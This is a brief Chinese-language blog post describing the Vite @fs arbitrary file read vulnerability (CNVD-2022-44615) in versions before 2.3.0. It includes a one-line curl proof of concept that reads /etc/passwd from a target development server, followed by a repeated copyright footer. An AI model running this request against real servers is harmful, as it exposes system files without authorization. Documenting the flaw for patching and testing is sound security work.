Vite @fs任意文件读取(CNVD-2022-44615)
漏洞说明
Vite 是一个现代前端构建工具,为 Web 项目提供更快、更精简的开发体验
它主要由两部分组成:具有热模块替换(HMR)功能的开发服务器,以及使用 Rollup 打包代码的构建命令
在 Vite 2.3.0 版本之前,可以通过 @fs 前缀读取文件系统上的任意文件
使用标准的 @fs 前缀访问/etc/passwd,可以获取文件内容
curl "http://your-ip:3000/@fs/etc/passwd"
-END-
版权所有:晨星交流
文章标题:Vite @fs任意文件读取漏洞(CNVD-2022-44615)全解析
文章链接:https://morningstar.xin/?post=134
本站文章均为原创,未经授权请勿用于任何商业用途
文章标题:Vite @fs任意文件读取漏洞(CNVD-2022-44615)全解析
文章链接:https://morningstar.xin/?post=134
本站文章均为原创,未经授权请勿用于任何商业用途
